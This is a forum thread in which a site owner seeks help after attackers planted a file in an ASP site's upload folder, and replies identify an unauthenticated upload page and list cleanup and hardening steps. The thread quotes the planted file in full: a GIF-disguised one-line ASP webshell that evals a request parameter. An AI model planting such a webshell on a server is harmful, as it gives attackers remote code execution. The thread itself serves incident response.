28,391
社区成员
发帖
与我相关
我的任务
分享ASP挂码问题求助?
我有一个网站,最近老是在网站的上传文件夹(uploadfiles)里面,自动的添加一个569853.asp的文件,
内容如下:
GIF89a888AAAAAAAAAA<%as99AA=REquEst("PA"):EvaL(as99AA)%>8888888888888888888888888888888888888888888888
同时,网站里面的ASP文件结尾部分,都被加上了一JAVAscript代码,指向的是一个木马网站,
当我访问这个网站时,电脑就中毒了!请问,各位大师,如何解决这个问题啊!!!谢谢
内容如下:
GIF89a888AAAAAAAAAA<%as99AA=REquEst("PA"):EvaL(as99AA)%>8888888888888888888888888888888888888888888888
同时,网站里面的ASP文件结尾部分,都被加上了一JAVAscript代码,指向的是一个木马网站,
当我访问这个网站时,电脑就中毒了!请问,各位大师,如何解决这个问题啊!!!谢谢
...全文
请发表友善的回复…
发表回复
tk2858 2009-12-07
- 打赏
- 举报
这个好像是代码的问题。已经解决了。。
三楼の郎 2009-05-23
- 打赏
- 举报
up_pic.asp里我没看到你在哪里作了用户是否登陆的检查,不做这个检查岂不是任何人只要访问up_pic.asp这个页面就可以往你的网站上传东西了。
要彻底解决这个问题你需要干以下几件事:
1、修补漏洞
2、清理代码,删除黑客的后门程序及恶意代码,采用这种方法进行攻击的一般都会留下后门方便下次再来,所以能不能彻底清理干净至关重要
3、修改密码,包括后台管理员的密码、数据库密码、Ftp帐户密码、甚至注册会员的密码,如果服务器也是你的甚至还需要修改服务器Windows登录密码,总之所有能通过网络登陆的密码可能都需要修改。
4、如果是使用Access数据库,需要修改Access数据库文件的文件名及目录,不修改这个别人知道了以后可以直接下载你的数据库文件,管理员帐户、注册会员的帐户什么的就全部暴露了
5、限制uploadfiles目录的执行权限,在IIS的uploadfiles目录属性里面把uploadfiles目录的执行权限设置为“无”,这样即便有人能利用上传漏洞往uploadfiles目录上传恶意脚本文件也会因为没有权限无法执行。
要彻底解决这个问题你需要干以下几件事:
1、修补漏洞
2、清理代码,删除黑客的后门程序及恶意代码,采用这种方法进行攻击的一般都会留下后门方便下次再来,所以能不能彻底清理干净至关重要
3、修改密码,包括后台管理员的密码、数据库密码、Ftp帐户密码、甚至注册会员的密码,如果服务器也是你的甚至还需要修改服务器Windows登录密码,总之所有能通过网络登陆的密码可能都需要修改。
4、如果是使用Access数据库,需要修改Access数据库文件的文件名及目录,不修改这个别人知道了以后可以直接下载你的数据库文件,管理员帐户、注册会员的帐户什么的就全部暴露了
5、限制uploadfiles目录的执行权限,在IIS的uploadfiles目录属性里面把uploadfiles目录的执行权限设置为“无”,这样即便有人能利用上传漏洞往uploadfiles目录上传恶意脚本文件也会因为没有权限无法执行。
tk2858 2009-05-23
- 打赏
- 举报
up_pic.asp的代码如下,请各位帮我分析一下。
<%
actionType=trim(Request.QueryString("actionType"))
picName = trim(Request.QueryString("picName"))
editImageNum = trim(Request.QueryString("editImageNum"))
editRemNum = trim(Request.QueryString("editRemNum"))
uploadPath = "../UploadFiles/"
%>
<HTML>
<HEAD>
<TITLE>添加/编辑图片</TITLE>
<LINK href="../css.css" type=text/css rel=stylesheet>
<script language=javascript>
function IsVote(loadpos)
{
document.all("id_uploadstr").style.display="block"
var newWindow = null
if (! newWindow || newWindow.closed)
{
newWindow=window.open(loadpos,"surveywin","scrollbars,dependent,width=10,height=10,top=50000,left=50000");
}
}
function saveImage()
{
var returnStr;
var sData = dialogArguments;
returnStr = "<img border=1 src=";
if (document.all("imageFileName").value!="")
{
//更新editbox的新闻
if (document.all("editImageNum").value==1)
{
sData.document.all("editFirstImageName").value = document.all("imageFileName").value;
}
if(document.all("actionType").value!="mod")
{
sData.document.all("editRemNum").value = document.all("remNum").value;
}
sData.document.all("editImageNum").value = document.all("editImageNum").value;
//返回值
returnStr += "<%=uploadPath%>"+document.all("imageFileName").value;
if (document.all("widthvalue").value!="")
{
returnStr += " width="+document.all("widthvalue").value;
}
if (document.all("heightvalue").value!="")
{
returnStr += " height="+document.all("heightvalue").value;
}
returnStr += " align="+document.all("duiqiStr").value;
returnStr += ">";
window.returnValue = returnStr;
window.close();
}
else
window.close();
}
function checkDisplay()
{
temp_allcolorradio = document.all("filetype");
if (temp_allcolorradio[0].checked)
{
document.all("urlType").style.display = "none";
document.all("uploadType").style.display = "block";
document.all("tomodify").style.display = "none";
}
else if(temp_allcolorradio[1].checked)
{
document.all("urlType").style.display = "block";
document.all("uploadType").style.display = "none";
document.all("tomodify").style.display = "none";
}
else
{
document.all("urlType").style.display = "none";
document.all("uploadType").style.display = "none";
document.all("tomodify").style.display = "block";
}
}
function toInsertImage()
{
var returnStr;
returnStr = "<img border=1 src=";
if ((document.all("imageUrl").value != null)&&(document.all("imageUrl").value!=="http://"))
{
returnStr += document.all("imageUrl").value;
if (document.all("widthvalue").value!="")
{
returnStr += " width="+document.all("widthvalue").value;
}
if (document.all("heightvalue").value!="")
{
returnStr += " height="+document.all("heightvalue").value;
}
returnStr += " align="+document.all("duiqiStr").value;
returnStr += ">";
window.returnValue = returnStr;
window.close();
}
}
function modifyImage()
{
var returnStr;
returnStr = "<img border=1 src=";
if ((document.all("picName").value != null))
{
returnStr += document.all("picName").value;
if (document.all("widthvalue").value!="")
{
returnStr += " width="+document.all("widthvalue").value;
}
if (document.all("heightvalue").value!="")
{
returnStr += " height="+document.all("heightvalue").value;
}
returnStr += " align="+document.all("duiqiStr").value;
returnStr += ">";
window.returnValue = returnStr;
window.close();
}
}
</script>
</HEAD>
<BODY bgcolor="#EFEBDE" oncontextmenu="return false;">
<table width=100% border=0 cellspacing=0 cellpadding=0 align=center bgcolor="#EFEBDE" height="200">
<tr>
<td valign=top>
<table width="100%" border="0" cellspacing="0" cellpadding="0" height="21">
<form name=setpro>
<tr bgcolor="#b7d3ff">
<td>
<div align="left"> 插入图片方法选择:
<input type=radio name=filetype value=1 checked onClick="checkDisplay();">上传图片<input onClick="checkDisplay();" type=radio name=filetype value=2>图片URl
<%if actionType="mod" then%>
<input onClick="checkDisplay();" type=radio name=filetype value=3 ID="Radio1">修改属性
<%end if%>
</div>
</td>
</tr>
</form>
<tr bgcolor="#000000">
<td height="1"><space height=1 type=block></td>
</tr>
</table>
<table width=100% border=0 cellspacing=0 cellpadding=4>
<tr valign="top" align="center">
<td colspan=2>
<!--上传中显示-->
<div align="center" id="id_uploadstr" style="display:none">
<table width="85%" border="0" cellspacing="0" cellpadding="0" ID="Table1">
<tr>
<td class=tdblack>
<font style="font-size:10.5pt"><i><br><br>正在上传文件......</i></font><br><br><br><br>
<b>注意:</b>请不要关闭此窗口,在文件上传结束后,本窗口将自动关闭。上传可能需要几分钟,请耐心等候!<br><br><br><br><br><br>
</td>
</tr>
</table>
</div>
<!--上传中显示-->
<table width="95%" border="0" cellspacing="0" cellpadding="0" ID="Table5">
<form name=modpro>
<tr>
<td height="25" class=tdblack>
对齐方式:<select id="duiqiStr" NAME="duiqiStr">
<option value="left">左对齐</option>
<option value="middle">中间</option>
<option value="right">右对齐</option>
</select>
<br>
图片大小:宽
<input type="text" name="widthvalue" size=3 maxlength=3 class="button1">
像素 高
<input type="text" name="heightvalue" size=3 maxlength=3 class="button1">
像素<br>
(不输入为默认大小)<br>
<input type="hidden" name="actionType" value="<%=actionType%>">
<input type="hidden" name="picName" value="<%=picName%>">
<!--图片返回值-->
<input type=hidden value="" name="imageFileName" id="imageFileName" onClick="saveImage();">
<input type=hidden value="" name="remNum" id="remNum">
<input type=hidden value="<%=editImageNum%>" name="editImageNum" id="editImageNum">
<!--图片返回值-->
</td>
</tr>
</form>
</table>
<div id="tomodify" style="display:none" align=left>
<%if actionType="mod" then%>
<input type="button" name="bSaveModify" value="保存修改" onClick="javascript:modifyImage()" class="button2">
<%end if%>
</div>
<%
actionType=trim(Request.QueryString("actionType"))
picName = trim(Request.QueryString("picName"))
editImageNum = trim(Request.QueryString("editImageNum"))
editRemNum = trim(Request.QueryString("editRemNum"))
uploadPath = "../UploadFiles/"
%>
<HTML>
<HEAD>
<TITLE>添加/编辑图片</TITLE>
<LINK href="../css.css" type=text/css rel=stylesheet>
<script language=javascript>
function IsVote(loadpos)
{
document.all("id_uploadstr").style.display="block"
var newWindow = null
if (! newWindow || newWindow.closed)
{
newWindow=window.open(loadpos,"surveywin","scrollbars,dependent,width=10,height=10,top=50000,left=50000");
}
}
function saveImage()
{
var returnStr;
var sData = dialogArguments;
returnStr = "<img border=1 src=";
if (document.all("imageFileName").value!="")
{
//更新editbox的新闻
if (document.all("editImageNum").value==1)
{
sData.document.all("editFirstImageName").value = document.all("imageFileName").value;
}
if(document.all("actionType").value!="mod")
{
sData.document.all("editRemNum").value = document.all("remNum").value;
}
sData.document.all("editImageNum").value = document.all("editImageNum").value;
//返回值
returnStr += "<%=uploadPath%>"+document.all("imageFileName").value;
if (document.all("widthvalue").value!="")
{
returnStr += " width="+document.all("widthvalue").value;
}
if (document.all("heightvalue").value!="")
{
returnStr += " height="+document.all("heightvalue").value;
}
returnStr += " align="+document.all("duiqiStr").value;
returnStr += ">";
window.returnValue = returnStr;
window.close();
}
else
window.close();
}
function checkDisplay()
{
temp_allcolorradio = document.all("filetype");
if (temp_allcolorradio[0].checked)
{
document.all("urlType").style.display = "none";
document.all("uploadType").style.display = "block";
document.all("tomodify").style.display = "none";
}
else if(temp_allcolorradio[1].checked)
{
document.all("urlType").style.display = "block";
document.all("uploadType").style.display = "none";
document.all("tomodify").style.display = "none";
}
else
{
document.all("urlType").style.display = "none";
document.all("uploadType").style.display = "none";
document.all("tomodify").style.display = "block";
}
}
function toInsertImage()
{
var returnStr;
returnStr = "<img border=1 src=";
if ((document.all("imageUrl").value != null)&&(document.all("imageUrl").value!=="http://"))
{
returnStr += document.all("imageUrl").value;
if (document.all("widthvalue").value!="")
{
returnStr += " width="+document.all("widthvalue").value;
}
if (document.all("heightvalue").value!="")
{
returnStr += " height="+document.all("heightvalue").value;
}
returnStr += " align="+document.all("duiqiStr").value;
returnStr += ">";
window.returnValue = returnStr;
window.close();
}
}
function modifyImage()
{
var returnStr;
returnStr = "<img border=1 src=";
if ((document.all("picName").value != null))
{
returnStr += document.all("picName").value;
if (document.all("widthvalue").value!="")
{
returnStr += " width="+document.all("widthvalue").value;
}
if (document.all("heightvalue").value!="")
{
returnStr += " height="+document.all("heightvalue").value;
}
returnStr += " align="+document.all("duiqiStr").value;
returnStr += ">";
window.returnValue = returnStr;
window.close();
}
}
</script>
</HEAD>
<BODY bgcolor="#EFEBDE" oncontextmenu="return false;">
<table width=100% border=0 cellspacing=0 cellpadding=0 align=center bgcolor="#EFEBDE" height="200">
<tr>
<td valign=top>
<table width="100%" border="0" cellspacing="0" cellpadding="0" height="21">
<form name=setpro>
<tr bgcolor="#b7d3ff">
<td>
<div align="left"> 插入图片方法选择:
<input type=radio name=filetype value=1 checked onClick="checkDisplay();">上传图片<input onClick="checkDisplay();" type=radio name=filetype value=2>图片URl
<%if actionType="mod" then%>
<input onClick="checkDisplay();" type=radio name=filetype value=3 ID="Radio1">修改属性
<%end if%>
</div>
</td>
</tr>
</form>
<tr bgcolor="#000000">
<td height="1"><space height=1 type=block></td>
</tr>
</table>
<table width=100% border=0 cellspacing=0 cellpadding=4>
<tr valign="top" align="center">
<td colspan=2>
<!--上传中显示-->
<div align="center" id="id_uploadstr" style="display:none">
<table width="85%" border="0" cellspacing="0" cellpadding="0" ID="Table1">
<tr>
<td class=tdblack>
<font style="font-size:10.5pt"><i><br><br>正在上传文件......</i></font><br><br><br><br>
<b>注意:</b>请不要关闭此窗口,在文件上传结束后,本窗口将自动关闭。上传可能需要几分钟,请耐心等候!<br><br><br><br><br><br>
</td>
</tr>
</table>
</div>
<!--上传中显示-->
<table width="95%" border="0" cellspacing="0" cellpadding="0" ID="Table5">
<form name=modpro>
<tr>
<td height="25" class=tdblack>
对齐方式:<select id="duiqiStr" NAME="duiqiStr">
<option value="left">左对齐</option>
<option value="middle">中间</option>
<option value="right">右对齐</option>
</select>
<br>
图片大小:宽
<input type="text" name="widthvalue" size=3 maxlength=3 class="button1">
像素 高
<input type="text" name="heightvalue" size=3 maxlength=3 class="button1">
像素<br>
(不输入为默认大小)<br>
<input type="hidden" name="actionType" value="<%=actionType%>">
<input type="hidden" name="picName" value="<%=picName%>">
<!--图片返回值-->
<input type=hidden value="" name="imageFileName" id="imageFileName" onClick="saveImage();">
<input type=hidden value="" name="remNum" id="remNum">
<input type=hidden value="<%=editImageNum%>" name="editImageNum" id="editImageNum">
<!--图片返回值-->
</td>
</tr>
</form>
</table>
<div id="tomodify" style="display:none" align=left>
<%if actionType="mod" then%>
<input type="button" name="bSaveModify" value="保存修改" onClick="javascript:modifyImage()" class="button2">
<%end if%>
</div>
tk2858 2009-05-23
- 打赏
- 举报
upclass.asp
代码如下:
%
'----------------------------------------------------------------------
'转发时请保留此声明信息,这段声明不并会影响你的速度!
'******************* 无惧上传类 V1.2 ************************************
'作者:梁无惧
'网站:http://www.25cn.com
'电子邮件:yjlrb@21cn.com
'版权声明:版权所有,源代码公开,各种用途均可免费使用,但是修改后必须把修改后的文件
'发送一份给作者.并且保留作者此版权信息
'**********************************************************************
'----------------------------------------------------------------------
Dim oUpFileStream
'----------------------------------------------------------------------
'文件上传类
Class UpFile_Class
Dim Form,File,Version,Err
Private Sub Class_Initialize
Version = "无惧上传类 Version V1.2"
Err = -1
End Sub
Private Sub Class_Terminate
'清除变量及对像
If Err < 0 Then
Form.RemoveAll
Set Form = Nothing
File.RemoveAll
Set File = Nothing
oUpFileStream.Close
Set oUpFileStream = Nothing
End If
End Sub
Public Sub GetData (MaxSize)
'定义变量
Dim RequestBinData,sSpace,bCrLf,sInfo,iInfoStart,iInfoEnd,tStream,iStart,oFileInfo
Dim iFileSize,sFilePath,sFileType,sFormValue,sFileName
Dim iFindStart,iFindEnd
Dim iFormStart,iFormEnd,sFormName
'代码开始
If Request.TotalBytes < 1 Then '如果没有数据上传
Err = 1
Exit Sub
End If
If MaxSize > 0 Then '如果限制大小
If Request.TotalBytes > MaxSize Then
Err = 2 '如果上传的数据超出限制
Exit Sub
End If
End If
Set Form = Server.CreateObject ("Scripting.Dictionary")
Form.CompareMode = 1
Set File = Server.CreateObject ("Scripting.Dictionary")
File.CompareMode = 1
Set tStream = Server.CreateObject ("ADODB.Stream")
Set oUpFileStream = Server.CreateObject ("ADODB.Stream")
oUpFileStream.Type = 1
oUpFileStream.Mode = 3
oUpFileStream.Open
oUpFileStream.Write Request.BinaryRead (Request.TotalBytes)
oUpFileStream.Position = 0
RequestBinData = oUpFileStream.Read
iFormEnd = oUpFileStream.Size
bCrLf = ChrB (13) & ChrB (10)
'取得每个项目之间的分隔符
sSpace = MidB (RequestBinData,1, InStrB (1,RequestBinData,bCrLf)-1)
iStart = LenB (sSpace)
iFormStart = iStart+2
'分解项目
Do
iInfoEnd = InStrB (iFormStart,RequestBinData,bCrLf & bCrLf)+3
tStream.Type = 1
tStream.Mode = 3
tStream.Open
oUpFileStream.Position = iFormStart
oUpFileStream.CopyTo tStream,iInfoEnd-iFormStart
tStream.Position = 0
tStream.Type = 2
tStream.CharSet = "gb2312"
sInfo = tStream.ReadText
'取得表单项目名称
iFormStart = InStrB (iInfoEnd,RequestBinData,sSpace)-1
iFindStart = InStr (22,sInfo,"name=""",1)+6
iFindEnd = InStr (iFindStart,sInfo,"""",1)
sFormName = Mid (sinfo,iFindStart,iFindEnd-iFindStart)
'如果是文件
If InStr (45,sInfo,"filename=""",1) > 0 Then
Set oFileInfo = new FileInfo_Class
'取得文件属性
iFindStart = InStr (iFindEnd,sInfo,"filename=""",1)+10
iFindEnd = InStr (iFindStart,sInfo,"""",1)
sFileName = Mid (sinfo,iFindStart,iFindEnd-iFindStart)
oFileInfo.FileName = Mid (sFileName,InStrRev (sFileName, "\")+1)
oFileInfo.FilePath = Left (sFileName,InStrRev (sFileName, "\"))
oFileInfo.FileExt = Mid (sFileName,InStrRev (sFileName, ".")+1)
iFindStart = InStr (iFindEnd,sInfo,"Content-Type: ",1)+14
iFindEnd = InStr (iFindStart,sInfo,vbCr)
oFileInfo.FileType = Mid (sinfo,iFindStart,iFindEnd-iFindStart)
oFileInfo.FileStart = iInfoEnd
oFileInfo.FileSize = iFormStart -iInfoEnd -2
oFileInfo.FormName = sFormName
file.add sFormName,oFileInfo
else
'如果是表单项目
tStream.Close
tStream.Type = 1
tStream.Mode = 3
tStream.Open
oUpFileStream.Position = iInfoEnd
oUpFileStream.CopyTo tStream,iFormStart-iInfoEnd-2
tStream.Position = 0
tStream.Type = 2
tStream.CharSet = "gb2312"
sFormValue = tStream.ReadText
If Form.Exists (sFormName) Then
Form (sFormName) = Form (sFormName) & ", " & sFormValue
else
form.Add sFormName,sFormValue
End If
End If
tStream.Close
iFormStart = iFormStart+iStart+2
'如果到文件尾了就退出
Loop Until (iFormStart+2) >= iFormEnd
RequestBinData = ""
Set tStream = Nothing
End Sub
End Class
'----------------------------------------------------------------------------------------------------
'文件属性类
Class FileInfo_Class
Dim FormName,FileName,FilePath,FileSize,FileType,FileStart,FileExt
'保存文件方法
Public Function SaveToFile (Path)
On Error Resume Next
Dim oFileStream
Set oFileStream = CreateObject ("ADODB.Stream")
oFileStream.Type = 1
oFileStream.Mode = 3
oFileStream.Open
oUpFileStream.Position = FileStart
oUpFileStream.CopyTo oFileStream,FileSize
oFileStream.SaveToFile Path,2
oFileStream.Close
Set oFileStream = Nothing
End Function
'取得文件数据
Public Function FileData
oUpFileStream.Position = FileStart
FileData = oUpFileStream.Read (FileSize)
End Function
End Class
%>
代码如下:
%
'----------------------------------------------------------------------
'转发时请保留此声明信息,这段声明不并会影响你的速度!
'******************* 无惧上传类 V1.2 ************************************
'作者:梁无惧
'网站:http://www.25cn.com
'电子邮件:yjlrb@21cn.com
'版权声明:版权所有,源代码公开,各种用途均可免费使用,但是修改后必须把修改后的文件
'发送一份给作者.并且保留作者此版权信息
'**********************************************************************
'----------------------------------------------------------------------
Dim oUpFileStream
'----------------------------------------------------------------------
'文件上传类
Class UpFile_Class
Dim Form,File,Version,Err
Private Sub Class_Initialize
Version = "无惧上传类 Version V1.2"
Err = -1
End Sub
Private Sub Class_Terminate
'清除变量及对像
If Err < 0 Then
Form.RemoveAll
Set Form = Nothing
File.RemoveAll
Set File = Nothing
oUpFileStream.Close
Set oUpFileStream = Nothing
End If
End Sub
Public Sub GetData (MaxSize)
'定义变量
Dim RequestBinData,sSpace,bCrLf,sInfo,iInfoStart,iInfoEnd,tStream,iStart,oFileInfo
Dim iFileSize,sFilePath,sFileType,sFormValue,sFileName
Dim iFindStart,iFindEnd
Dim iFormStart,iFormEnd,sFormName
'代码开始
If Request.TotalBytes < 1 Then '如果没有数据上传
Err = 1
Exit Sub
End If
If MaxSize > 0 Then '如果限制大小
If Request.TotalBytes > MaxSize Then
Err = 2 '如果上传的数据超出限制
Exit Sub
End If
End If
Set Form = Server.CreateObject ("Scripting.Dictionary")
Form.CompareMode = 1
Set File = Server.CreateObject ("Scripting.Dictionary")
File.CompareMode = 1
Set tStream = Server.CreateObject ("ADODB.Stream")
Set oUpFileStream = Server.CreateObject ("ADODB.Stream")
oUpFileStream.Type = 1
oUpFileStream.Mode = 3
oUpFileStream.Open
oUpFileStream.Write Request.BinaryRead (Request.TotalBytes)
oUpFileStream.Position = 0
RequestBinData = oUpFileStream.Read
iFormEnd = oUpFileStream.Size
bCrLf = ChrB (13) & ChrB (10)
'取得每个项目之间的分隔符
sSpace = MidB (RequestBinData,1, InStrB (1,RequestBinData,bCrLf)-1)
iStart = LenB (sSpace)
iFormStart = iStart+2
'分解项目
Do
iInfoEnd = InStrB (iFormStart,RequestBinData,bCrLf & bCrLf)+3
tStream.Type = 1
tStream.Mode = 3
tStream.Open
oUpFileStream.Position = iFormStart
oUpFileStream.CopyTo tStream,iInfoEnd-iFormStart
tStream.Position = 0
tStream.Type = 2
tStream.CharSet = "gb2312"
sInfo = tStream.ReadText
'取得表单项目名称
iFormStart = InStrB (iInfoEnd,RequestBinData,sSpace)-1
iFindStart = InStr (22,sInfo,"name=""",1)+6
iFindEnd = InStr (iFindStart,sInfo,"""",1)
sFormName = Mid (sinfo,iFindStart,iFindEnd-iFindStart)
'如果是文件
If InStr (45,sInfo,"filename=""",1) > 0 Then
Set oFileInfo = new FileInfo_Class
'取得文件属性
iFindStart = InStr (iFindEnd,sInfo,"filename=""",1)+10
iFindEnd = InStr (iFindStart,sInfo,"""",1)
sFileName = Mid (sinfo,iFindStart,iFindEnd-iFindStart)
oFileInfo.FileName = Mid (sFileName,InStrRev (sFileName, "\")+1)
oFileInfo.FilePath = Left (sFileName,InStrRev (sFileName, "\"))
oFileInfo.FileExt = Mid (sFileName,InStrRev (sFileName, ".")+1)
iFindStart = InStr (iFindEnd,sInfo,"Content-Type: ",1)+14
iFindEnd = InStr (iFindStart,sInfo,vbCr)
oFileInfo.FileType = Mid (sinfo,iFindStart,iFindEnd-iFindStart)
oFileInfo.FileStart = iInfoEnd
oFileInfo.FileSize = iFormStart -iInfoEnd -2
oFileInfo.FormName = sFormName
file.add sFormName,oFileInfo
else
'如果是表单项目
tStream.Close
tStream.Type = 1
tStream.Mode = 3
tStream.Open
oUpFileStream.Position = iInfoEnd
oUpFileStream.CopyTo tStream,iFormStart-iInfoEnd-2
tStream.Position = 0
tStream.Type = 2
tStream.CharSet = "gb2312"
sFormValue = tStream.ReadText
If Form.Exists (sFormName) Then
Form (sFormName) = Form (sFormName) & ", " & sFormValue
else
form.Add sFormName,sFormValue
End If
End If
tStream.Close
iFormStart = iFormStart+iStart+2
'如果到文件尾了就退出
Loop Until (iFormStart+2) >= iFormEnd
RequestBinData = ""
Set tStream = Nothing
End Sub
End Class
'----------------------------------------------------------------------------------------------------
'文件属性类
Class FileInfo_Class
Dim FormName,FileName,FilePath,FileSize,FileType,FileStart,FileExt
'保存文件方法
Public Function SaveToFile (Path)
On Error Resume Next
Dim oFileStream
Set oFileStream = CreateObject ("ADODB.Stream")
oFileStream.Type = 1
oFileStream.Mode = 3
oFileStream.Open
oUpFileStream.Position = FileStart
oUpFileStream.CopyTo oFileStream,FileSize
oFileStream.SaveToFile Path,2
oFileStream.Close
Set oFileStream = Nothing
End Function
'取得文件数据
Public Function FileData
oUpFileStream.Position = FileStart
FileData = oUpFileStream.Read (FileSize)
End Function
End Class
%>
tk2858 2009-05-23
- 打赏
- 举报
大师,这个怎么解决啊???帮忙看看啊!!
三楼の郎 2009-05-23
- 打赏
- 举报
显然是文件上传部分存在漏洞,被人家上传木马文件了!
tk2858 2009-05-23
- 打赏
- 举报
在线等专家回复!!!谢谢!!!
tk2858 2009-05-22
- 打赏
- 举报
这个文件名是随时变化的。。
kongyl 2009-05-22
- 打赏
- 举报
你自己建立一个这样的569853.asp的文件 他不是就不能用了啊
